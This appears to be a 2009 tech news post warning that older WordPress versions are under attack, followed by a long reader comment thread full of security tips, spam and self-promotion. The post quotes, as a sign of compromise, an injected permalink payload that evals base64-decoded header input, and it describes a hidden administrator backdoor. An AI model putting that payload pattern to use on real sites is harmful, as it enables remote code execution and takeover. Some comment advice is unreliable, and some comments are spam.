We’re hearing of numerous reports that older versions of WordPress are exposed to security threats. WordPress is one of the largest blogging engines with over 5,317,360 – and counting – downloads for their latest version, 2.8. Many large blogs, including TechCrunch, rely on WordPress to get the news out and post content online.
Writes Lorelle on her WordPress-centric blog:
There are two clues that your WordPress site has been attacked:
First, there are strange additions to permalinks, such as example.com/category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/. The keywords are “eval” and “base64_decode.”
The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize.
To prevent this attack, if you have not done so already, update your WordPress install immediately to the latest version. Change all your passwords to a strong password (cough), including WordPress blog access for all users, database, FTP, control panels, etc. These are all highly recommended procedures.
Automattic, WordPress’ parent company, hasn’t commented on this issue, but we’ll keep everyone updated. In the meantime, we urge you to update your WordPress blog immediately.
Update: We’ve reached out to Matt Mullenweg, founder of WordPress, and he mentioned the following. Automattic is not the parent company of WordPress. Automattic contributes to WordPress.org like many other companies do. Mullenweg published a blog post mentioning what steps people should take to ensure their WordPress blog is safe.
(Image via Developer Tutorials)
I’m guessing .com users are fine? that this only applies to older versions of .org
They are talking about self-hosted Wordpress sites.
4 ways to find out if your Wordpress installation has been affected by this bug: http://tinyurl.com/m6yz9f
Can someone answer this questions please: If your blog has been affected, does upgrading to the most current version, get rid of the bug? Thanks in advance.
Joomla.
I had a Joomla site and was hacked for not upgrading. All open source is the same. You need to upgrade
No it doesn’t, the unauthorized admin account is still there.
no.
No it doesn’t, once someone has access upgrading it will not undo that access if they managed to change passwords, etc.
Of Course, upgrade will remove the bugs.
Nice post. Thanks for sharing. This alerts the whole blogging community, and saves from risks, also helps to get the normal functionality by a simple upgrade with more security. WordPress really serves good.
UPDATE: Two more ways to detect the hack: http://is.gd/2WJX4
thanks .. I have upgraded to the latest version ….
Best,
Daina
Thanks, I have heard about this and Google has once warned webmasters about using older WP version. I always upgraded to the latest version. Thanks
It’s not just about having the latest version of WP – which helps. It’s about having a clearly laid out hacker prevention plan. There are many other things that need to be done in order to protect your WP install (as with any other platform).
Wordpress is simple to install. This causes a false sense of security. especially with the bulk of WP users who really don’t understand anything past the WP dashboard.
Hindsight is always 20-20. Do your research and make your site secure.
Recently I also saw such an attack at my friend’s site, his blog was running on older version, firstly I thought there was an error in a data base but after few research on internet I got the point, I changed the permalink structure and the problem was solved. I immediately upgrade that blog to the latest version. Everything is under control now.
Maybe TechCrunch should update their site from V2.7 as well? Or did you implement a plugin that states the incorrect version?
Google “Wordpress Security”. There are many things one can do to prevent attacks and getting hacked.
We install this plugin on all of our sites: http://wordpres...-security-scan/
Your post only touches the surface of this issue.
)-:
+1 LOL
If you want to simply hide your WordPress version from possible attackers (might be a good idea for TechCrunch) all you need to do is add one line to your theme’s functions.php file:
http://gist.github.com/167926
Wordpress is far from perfect, it still has a memory overrun error where the application goes out of memory..
But, i did not know that techcrunch uses wordpress!
Also, I am having unknown people signing up as users in my blog. Should I be worried?
My question is why would you allow “unknown” people sign up in the first place?
… because some of the blogs are community blog and admins allow visitors to become members.
It should be controlled from Dashboard general settings. Check back pl.
If you are allowing signups in your WP blogs, watch out for “.ru” domains, or “viagra” or “meds” type of names.
If you don’t allow signups, better upgrade your site. My sites were victims of such attacks, as mentioned in this TC article. There were unknown users signing up on my blog, although i’m not accepting signups.
Thanks for this alert. Today itself I received an email with alert to the reset of admin panel in my wordpress installation. Also I do keep hearing horrible stories on the sites being hacked.
This alert from techcrunch will prove to be lifesaver for many.
And why not this happened when older versions were the latest ones?
This is publicity gimmick.
Wordpress Antivirus is a must install plugin which will make sure that your wordpress blog stays unaffected by malicious code and hackers: http://tinyurl.com/wpantivirus
Thanks for this. I plan on testing it on one of our sites.
This plugin only seems to scan the site’s active template files. And when it finds something suspicious you are left wondering what to do.
The fact that a CMS needs “virus/malware” software of its own is frightening. WordPress is the BIND/Sendmail of the blogging world.
I have got this warning before and always prompt in updating but the administrator (2) problem sounds very inquisitive. How can there be an hidden administrator? If it is such then there could be a big havoc!
I had a “viagra” pharmacy (or their affiliate) injecting a re-direct in my wordpress installation and it’s incredible tough to figure out where they’ve placed it.
Even after the latest upgrade and some extensive search for the “location” code, it’s still there and I have no chance but hiring a WP specialist to digg into the site.
Wordpress started to turn into phpnuke, which was a hackers paradise.
And perhaps change your admin’s e-mail to something less conspicuous than “admin@techcrunch.com”. Sorry guys…..
I’ll stop now……
To the Techcrunch Admins:
Guys, I would suggest you hide the direct login path to the Wroespress Login area. Anyone can type wp-login.php and get to the login page for Techcrunch. You can use HTACCESS to redirect such requests to your homepage.
Ofcourse one needs to know the UN and PW to login, but here brute force and dictionary attacks are possible, if the login page is in the open
To prevent those you can apply the WP Login Lockdown plugin, which stalls and prevents such attacks. I have seen many popular blogs are using that plugin, and its really effective and keeps hackers at bay!
Using strong FTP password is like putting lipstick on a pig. FTP transfers all credentials as plain text, so those can be sniffed. Use SFTP instead.
This absolutely destroyed my blog, which has been “down” for a very long time now. I’ve moved everything and upgraded software, so I’ll be back in business any day. This is a nasty hack that essentially turned control of my site over to others.
Terri: Delete readme.html from public_html
. No use telling people what version you are running!
TechCrunch do the same…… and Daniel from your blog also….
Thanks for the tip, the files install.php and install-helper.php inside the wp-admin directory mus also be renamed to something different!
WordPress has and will continue to be vulnerable to attacks. The sad fact is that the code base is very poor and it’s truly astonishing that it is so widely used. Yes, WordPress works and is great software, but the core could be MUCH better.
I know, you look at the codebase for projects like this and it’s like WTF? But so many people use it…
Agree, and it saps CPU too. Caching should be part of the original build.
Thanks for informing us TC and for the hints too.
Wordpress security must be taken seriously… I would recommend:
-Install a logging plugin to it (to alert on new attacks, and get an audit trail of everything that is going on):
http://www.ossec.net/wpsyslog2
-Monitor your site on real time. This free online tool will notify you if your site is ever modified by an attacker or blacklisted:
http://www.sucuri.net
-Stay updated. This link can verify the version of your wordpress site and check if you have any vulnerable plugin or incorrect server config:
http://sucuri.n...x.php?page=scan
Thanks,
Install this simple plugin on any WordPress to block bad queries like that:
http://pastebin.com/f6697b79
It could easily be expanded to also look at $_POST data which is another form of attack you’ll never see in your logs.
Thanks a lot _ck_
This must have happened to me, I noticed the weird permalinks and then upgraded to the latest version. I checked for users I didn’t recognize and there aren’t any, it looks okay… question now is what else should I look for? I know I’ve been compromised, what else do I do?
Wait on second look, I did have an unauthorized admin user! He just wasn’t showing up on the list. It was funny… when I looked at my users, it said there were 5 admins. But only four on the list, and I know all four. When I queried the database outside wordpress, the fifth showed up. sneaky.
As a side point, why have you illustrated this article with a modified piece of Halo 3 artwork? I mean, I’m not complaining, I just don’t get what you’re referencing.
I was just wondering the same. It doesn’t really make sense..
What?! You mean Wordpress has security holes?!
Wordpress is Swiss cheese and always has been. Anyone who is installing WP for himself should already know this. I hope.
But I suppose it’s good that you gave a polite hint to those who don’t know. The webservers of people who don’t do their research end up inadvertently DDoSing the servers of those of us who do.
Wordpress toooo… I suppose it all due to recession lot of people explored the security lapses.
First off, Don’t this link, mentione in one of above comments: wordpress.com/security/last328 (Spammy link).
Second most, it’s not only happening on older WordPress software, even WordPress 8.1 is getting tons of RFIs and spam query strings injection.
I’m pretty sure Firehost keeps your Wordpress install updated automatically, plus they’ve got solid support.
/plug
Correction to typos:
1. WordPress 8.1 -> WordPress 2.8.1
2. Dont’ this link -> dont’ visit this link
I had this problem few weeks ago and I wrote about my experience in a blog post (http://mixd.in/X) also listing the plugins I used to secure my blog.
Beside keeping the blog updated, a best practice would be to make it at “customized” as possible.
Get rid of the Admin user and create an admin user with a different name, change the prefix of your tables to something different that wp_, double check the chmod of all your files.
They seem to use admin(letter) as well. If you’re lucky, you can see the unexpected administrators for a split second.
The exploit inserts some html in wp_usermeta that uses html to attempt to hide the injected admin users from being listed.
I’ve found them through all instances of Wordpress that I run, even the ones that have been kept current
There’s also someone out there inserting admin accounts named ‘Wordpress’ – nicely done.
Tech Crunch please add more details to this article. This cannot be fixed by just changing your passwords.
You first need to go to permalink settings > manually remove those codes. Remove the extra admin user that has been added.
http://www.wpbe...-latest-attack/
Anyone who has been hacked, look at the article above for a fix and further security.
I have immediately shifted to latest version. Thank God.
I realize that folks here are taking a tech centered approach to this issue, and that’s fabulous and very helpful. But I really wish we in this industry, and legal brains like Mike Arrington especially, would push hard for tougher laws on the crooks who create these problems in the first place. Every instance of a hack like that should result in one count of breaking and entering. This would mean thousands of counts and years and years in jail.
I also realize that these people are extremely difficult to locate, and when they are found they’re often in Eastern Europe or whatever.
Nevertheless, I think that the criminal angle needs to be codified as much as possible through tougher laws. Maybe if examples are set in the U.S. they’ll be followed elsewhere (hoping laughter is kept to a minimum here).
Unfortunately, it’ll never happen, because too many techies have a grudging admiration for criminal hackers.
People assume all hacks come from Eastern europe, they are wrong! When my blog was hacked I checked the log files and discovered the hackers IP was from California USA.
The hacker inserted hidden links, I wasnt aware of the hack until google sent me an email informing me my site was being removed temporarily from their index. They slapped me with 30 days penalty & I lost 80% of my traffic plus lost income opportunity from adsense.
Another sign your site might have been hacked is to check your traffic, has it dropped too much? That could be sign google has de-indexed your blog and have not told you why.
The hacker installed the 700 hidden links on my blogs footer. To fix the problem I removed wordpress and installed a fresh one. But this latest hack might prove to be a big problem because the malware seems to install spam (hidden links) into old blog post. Just re-installing wordress might not be enough to remove it, to remove it completely you either clean each post or delete the post and lose valued traffic.
I have since installed wordress firewall plugin in all my blogs. This plugin will even send you an email when someone tries to hack your site plus the hackers IP.
I wonder whether the six hack attempts on my main blog last month were from this latest hack?
Cool
Thanks for the heads up Tech Crunch! I’ve updated to the latest version of WordPress. It’s kind of ironic that TechCrunch, CrunchGear, and MobileCrunch are still using 2.7.1!
I am trying to Upgrade my blog to wordpress from the blogger host but unable due to different problems.
Dhakalji. Blogger is good too. I am sticking with it.
Ya it’s good…you know if you don’t care about your blog being down all the time…
“WordPress is one of the largest blogging engines with over 5,317,360 – and counting – downloads for their latest version, 2.8. Many large blogs, including TechCrunch, rely on WordPress to get the news out and post content online.”
WHY CAN’T THEY COME UP WITH A STABLE VERSION?
This isn’t exactly easy. Has there ever been any software or internet applications that are completely secure and stable? Especially anything open source is particularly vulnerable because the whole system is transparent.
Not looking good at all.
I run several WordPress blogs and luckily I have not had any issues like this.
This is very frightening. I have been using Wordpress since I was like eight years old. I hope my blog has not been infected with one of these invisible viruses.
Does anybody know any other warning signs?
Also, can this virus affect one’s pageviews? Does it travel over RSS feeds?
Also, will it change the content of posts? Does it make it so that you are more susceptible to spam?
Wow, there are many questions this raises in my mind.
NS
Wow, this is a little scry… might explain what happened to one of my favorite sites. They have been down for a week now with no explaination
oooo
The Best Auto Short News WebSite: Breaking News, Car Reviews, Spy Photos, Green Cars, Car Videos, Present Your Car, All Auto Brands News.
Click on my nick name to enter the site…
It is always good to upgrade to latest version as soon as it is available for download. My personal wordpress blog too was hacked and injected some script in every .php page. This thought me a big lesson. Still there are many ways to protect it. This may help users to protect their wordpress blog. @ http://annanta....wordpress-blog/
I upgraded my blog today and saw there were 3 admins.. me, my wife and … no one? Although the site displayed the total of 3 admins, only two showed up. I decided i was going to try and delete all users i did not know (since it is my personal blog) and when i did, it asked who i wanted to associate posts and links to from the deleted users. In the drop down, it showed myself, my wife and some other random name… the missing admin! I looked at the source code and found the user id and was able to manually delete the user account. I was VERY surprised to see this happen.
You should probably remove that automattic is the parent company to prevent confusion as it is not the parent company of wordpress.
Thanks Tech Crunch for informing us.
Wordpress is just so popular and therefore more interesting for attacks. Everybody is learning something out of this isn’t it
Therefore wordpress will become even better and better!
Hi – i’m running a fairly orld version of WP (namely 2.7) should I be worried ?
mark2block
WordPress had issued a blog named ‘How to Keep WordPress Secure’. Told you how to secure your WordPress. http://wordpres...rdpress-secure/
It’s a big problem about the security of blogging stuff. How to resolve these kind of questions are still unsure.
The developers should work hard on it.
Suggest a secure software to protect your PC and Internet.
Security Shield 2009
http://www.111d...t-security.html
hi, wordpress is a great tools for blogging.
Can someone please tell me — if my site has been hacked (which it has), does upgrading fix it?
The reason I couldn’t upgrade is because I kept getting this error message:
Could not copy file: /public_html/wp-content/upgrade/core/wordpress/wp-comments-post.php
Any suggestions?
If older version is getting security threat then why users are using older version.
Older version of Wordpress must be upgraded to latest version of Wordpress.
Older version had some security bugs those are removed now.
well I run wordpress & I all wasy keep it updated.